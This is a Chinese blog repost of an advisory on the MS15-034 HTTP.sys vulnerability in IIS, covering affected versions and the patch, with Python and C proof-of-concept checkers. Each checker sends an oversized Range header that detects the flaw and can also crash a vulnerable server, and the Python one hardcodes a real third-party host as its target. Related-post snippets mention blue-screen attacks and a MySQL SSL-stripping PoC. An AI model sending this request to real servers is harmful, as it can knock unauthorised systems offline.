mysql cve-2015-3152_MS15-034 HTTP.sys 远程执行代码(CVE-2015-1635)

最新推荐文章于 2024-06-24 15:27:26 发布
最新推荐文章于 2024-06-24 15:27:26 发布
阅读量258 收藏
点赞数
文章标签: mysql cve-2015-3152
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35752233/article/details/113425974
版权

在微软4月14日补丁日发布的补丁中,有一个针对IIS服务器的远程代码执行漏洞危害非常大,请广大用户注意。

漏洞信息

远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。

成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。

若要利用此漏洞,攻击者必须将经特殊设计的 HTTP 请求发送到受影响的系统。 通过修改 Windows HTTP 堆栈处理请求的方式,安装更新可以修复此漏洞。

44ef51a0e24814c46f3c41a85d5c76e5.png

危害评级

严重

影响范围

影响以下版本操作系统的IIS服务器

Windows 7

Windows 8

Windows server 2008

Windows server 2012

修复方法

目前微软官方已经给出修复补丁(3042553),用户安装修复补丁即可。

参考

附测试POC

注:此脚本可验证服务器是否存在漏洞,但并没有经过充分的测试,不排除会产生不可预知的后果,请谨慎使用!

#!/usr/bin/env python

#-*-coding:utf-8-*-

import socket

import random

ipAddr = "www.secpulse.com"

hexAllFfff = "18446744073709551615"

req1 = "GET / HTTP/1.0\r\n\r\n"

req = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + hexAllFfff + "\r\n\r\n"

print "[*] Audit Started"

try:

client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

client_socket.connect((ipAddr, 80))

client_socket.send(req1)

boringResp = client_socket.recv(1024)

if "Microsoft" not in boringResp:

print "[*] Not IIS"

exit(0)

client_socket.close()

client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

client_socket.connect((ipAddr, 80))

client_socket.send(req)

goodResp = client_socket.recv(1024)

if "Requested Range Not Satisfiable" in goodResp:

print "[!!] Looks VULN"

elif " The request has an invalid header name" in goodResp:

print "[*] Looks Patched"

else:

print "[*] Unexpected response, cannot discern patch status"

except Exception,e:

print e

多线程的扫描脚本就不放了~

附C版本

/*

UNTESTED - MS15-034 Checker

THE BUG:

8a8b2112 56 push esi

8a8b2113 6a00 push 0

8a8b2115 2bc7 sub eax,edi

8a8b2117 6a01 push 1

8a8b2119 1bca sbb ecx,edx

8a8b211b 51 push ecx

8a8b211c 50 push eax

8a8b211d e8bf69fbff call HTTP!RtlULongLongAdd (8a868ae1) ; here

ORIGNAL POC: http://pastebin.com/raw.php?i=ypURDPc4

BY: john.b.hale@gmai.com

Twitter: @rhcp011235

*/

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

int connect_to_server(char *ip)

{

int sockfd = 0, n = 0;

struct sockaddr_in serv_addr;

struct hostent *server;

if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)

{

printf("\n Error : Could not create socket \n");

return 1;

}

memset(&serv_addr, '0', sizeof(serv_addr));

serv_addr.sin_family = AF_INET;

serv_addr.sin_port = htons(80);

if(inet_pton(AF_INET, ip, &serv_addr.sin_addr)<=0)

{

printf("\n inet_pton error occured\n");

return 1;

}

if( connect(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0)

{

printf("\n Error : Connect Failed \n");

return 1;

}

return sockfd;

}

int main(int argc, char *argv[])

{

int n = 0;

int sockfd;

char recvBuff[1024];

// Check server

char request[] = "GET / HTTP/1.0\r\n\r\n";

// our evil buffer

char request1[] = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n";

if(argc != 2)

{

printf("\n Usage: %s \n",argv[0]);

return 1;

}

printf("[*] Audit Started\n");

sockfd = connect_to_server(argv[1]);

write(sockfd, request, strlen(request));

read(sockfd, recvBuff, sizeof(recvBuff)-1);

if (!strstr(recvBuff,"Microsoft"))

{

printf("[*] NOT IIS\n");

exit(1);

}

sockfd = connect_to_server(argv[1]);

write(sockfd, request1, strlen(request1));

read(sockfd, recvBuff, sizeof(recvBuff)-1);

if (strstr(recvBuff,"Requested Range Not Satisfiable"))

{

printf("[!!] Looks VULN\n");

exit(1);

} else if(strstr(recvBuff,"The request has an invalid header name")) {

printf("[*] Looks Patched");

} else

printf("[*] Unexpected response, cannot discern patch status");

}

本文作者:SP小编

优游的鱼
关注
HTTP.sys远程执行代码漏洞验证及复现——CVE-2015-1635MS15-034
7Riven's blog
12-07 2万+
目录 漏洞概述 漏洞环境部署 漏洞验证 漏洞利用:ms15_034 漏洞防御 漏洞概述 HTTP.sys简介 HTTP.sys是Microsoft Windows处理HTTP请求的内核驱动程序,为了优化IIS服务器性能,从IIS6.0引入,IIS服务进程依赖HTTP.sysHTTP.sys远程代码执行漏洞实质是HTTP.sys的整数溢出漏洞 漏洞成因 远程执行代码漏洞存在于 ...
mysslstrip:CVE-2015-3152 PoC
06-06
单条 mysslstrip 是一个基于 Python 的概念验证,展示了如何根据来 MITM MySQL 流量和剥离 SSL/TLS。 用法 mysslstrip.py [-h] [-p LISTEN_PORT] [-i LISTEN_INTERFACE] dest 示例输出 [root@duo1 ~]# python2.7 mysslstrip.py -p 3307 127.0.0.1:3306 2015-04-29 21:33:14+0000 [-] Log opened. 2015-04-29 21:33:14+0000 [-] listen: 127.0.0.1:3307; connect: 127.0.0.1:3306 2015-04-29 21:33:14+0000 [-] MySQLForwardServerFactory starting on 3307 2015-04
cve-2015-1635
weixin_43268670的博客
12-30 1697
转载:https://blog.csdn.net/qq_38656841/article/details/98740127 今天在一家银行里面护网看到一个cve-2015-1635的告警,打击面挺广的虽然是2015年的漏洞但是打击的面积是server 2008到server2012R2的版本对于现在来说server2012的服务器仍是不少的,今天做个试验记录下这个cve的漏洞。 实验开始: Server2018iis 服务器搭建 看一下iis的ip 搭建成功确认没问题(配...
MS15-034 CVE-2015-1635 HTTP远程代码执行漏洞 (漏洞验证)_ms15-034 cve-2015-1635 http远程代码执行漏洞检测
最新发布
m0_60721823的博客
06-24 454
我们在看视频学习的时候,不能光动眼动脑不动手,比较科学的学习方法是在理解之后运用它们,这时候练手项目就很适合了,只是里面的项目比较多,水平也是参差不齐,大家可以挑自己能做的项目去练练。这是我花了几天的时间去把Python所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。攻击开始后,服务器瞬间蓝屏然后自动重启,由于实在真实环境中进行漏洞验证DDOS攻击危害严重所以不执行命令进行演示。
CVE-2015-1635
龙卷风摧毁停车场
02-21 2363
Microsoft Windows是美国微软(Microsoft)公司发布的一系列操作系统。Microsoft Internet Information Services(IIS)是一套运行于Microsoft Windows中的互联网基本服务。使用Microsoft IIS 6.0以上版本的Microsoft Windows的HTTP协议堆栈(HTTP.sys)中存在远程执行代码漏洞,该漏洞源于HTTP.sys文件没有正确分析经特殊设计的HTTP请求。
HTTP.sys 远程执行代码 漏洞 MS15-034 CVE-2015-1635
mixboot
09-26 1807
HTTP.sys 远程执行代码 漏洞MS15-034 漏洞分析 MS15-034 漏洞分析 参考: [思路/技术] HTTP.SYS远程执行代码漏洞分析 (MS15-034
mysql cve-2015-3152_麻烦的安全漏洞解决方案
weixin_29304985的博客
01-27 481
1.Hadoop 未授权访问【原理扫描】 2/4 50% 2解决方案:配置防火墙,不允许集群外机器访问50070端口2.Oracle MySQL SSL证书验证安全限制绕过漏洞(CVE-2015-3152) 2/4 50% 2解决方案:配置防火墙,不允许集群外机器访问3.ZooKeeper 未授权访问【原理扫描】 3/4 75% 3解决方案:配置防火墙,不允许集群外机器访问2181端口4.SSL ...
MS15-034 HTTP.sys 远程执行代码CVE-2015-1635)POC
03-19
远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码
MS15-034 HTTP.sys远程执行代码漏洞(原理扫描)
11-16
https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2015/ms15-034 如果在一台Windows Server 2012 R2的服务器上直接安装补丁文件KB3042553,可能会出现“此更新不适用于您的计算机”的问题,这...
CVE-2015-1635MS15-034Http.sys的利用工具)
11-10
利用 Http.sys 驱动对urlacl进行操作,由于Http.sys是IIS服务器的基础,其优先级高于IIS,不会造成端口bind冲突,达到端口服用效果,由于与受害机对外服务端口相同,可做到极高的隐蔽性。由于其生效后效果很类似于...
Windows Server 2008 R2 Microsoft Windows HTTP.sys远程代码执行漏洞 (MS15-034)(CVE-2015-1635)
友人A的博客
06-18 1656
一、漏洞情况 1、 2、 二、整改记录 1、 2、 3、 4、 5、
CVE-2015-1635(MS15-034 )进行DOS攻击
weixin_30832983的博客
07-26 305
上一篇的文章方法进行检测漏洞是否存在,接着我们搭建win2008进行DOS攻击测试,导致服务器蓝屏,异常关机。 靶机:windows2008 IIS7.0 192.168.31.91 攻击机:Kali 攻击机进行访问靶机web界面: 可以正常访问,接着使用MSF进行攻击测试 msf auxiliary(scanner/http/ms15_034_http_sys_m...
cve-2015-1635 poc
weixin_30929195的博客
04-17 462
1 import socket 2 import random 3 ipAddr = "10.1.89.20" 4 hexAllFfff = "18446744073709551615" 5 req1 = "GET / HTTP/1.0\r\n\r\n" 6 req = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-...
CVE-2015-1635_ms15_034蓝屏(80)
简单安全
03-26 684
2015年4月安全补丁日,微软发布的众多安全更新中,修复了HTTP.sys中一处允许远程执行代码漏洞,编号为:CVE-2015-1635MS15-034)。利用HTTP.sys的安全漏洞,攻击者只需要发送恶意的http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃。
CVE-2015-1635(MS15-034)-HTTP.sys远程代码执行复现
m0_58596609的博客
12-16 2158
CVE-2015-1635(MS15-034)-HTTP.sys远程代码执行复现
CVE-2015-1635-HTTP.SYS远程执行代码漏洞(ms15-034
鹿鸣天涯
12-16 4011
Windows Server 2012 R2修复MS15-034漏洞,此更新不适用于您的计算机 1.MS15-034漏洞的补丁是KB3042553; 2.如果在一台Windows Server 2012 R2的服务器上直接安装补丁文件KB3042553,可能会出现“此更新不适用于您的计算机”的问题,这是因为此补丁依赖于补丁:KB3021910、KB2919355。只需要按顺序安装以下补丁即可:KB2919442、KB3021910、KB2919355、KB3042553; 3.安装补丁之后对机器的性能、.n
CVE-2015-1635:IIS远程代码执行漏洞/HTTP.sys 远程执行代码漏洞(MS15-034)
weixin_38896449的博客
06-01 1194
1、漏洞介绍 远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。 影响版本: 安装了IIS6.0以上的Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2版本 2、漏洞检测 执行curl http://11.
CVE-2015-1635/MS15-034远程代码执行漏洞
dgjkkhcf的博客
09-20 4267
在4月的补丁日,微软通过标记为“高危”的MS15-034补丁,修复了HTTP.SYS中一处远程代码漏洞CVE-2015-1635。据微软公告(https://technet.microsoft.com/en-us/library/security/MS15-034)所称,当存在该漏洞的HTTP服务器接收到精心构造的HTTP请求时,可能触发远程代码在目标系统以系统权限执行
mysql cve-2015-3152_The BACKRONYM MySQL Vulnerability (CVE-2015-3152
weixin_36429611的博客
02-07 190
Earlier this year, I – along with some members of our DevOps team – noticed some interesting behavior in libmysqlclient and the MySQL CLI: no matter how hard we tried (no matter how many MYSQL_OPT_SSL...
Microsoft Windows HTTP.sys远程代码执行漏洞(MS15-034)(CVE-2015-1635)【原理扫描】
05-24
Microsoft Windows HTTP.sys远程代码执行漏洞(MS15-034)(CVE-2015-1635)是一种存在于HTTP协议栈中的安全漏洞,可以导致远程攻击者在未经身份验证的情况下以SYSTEM权限执行任意代码。攻击者可以通过发送特制的HTTP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值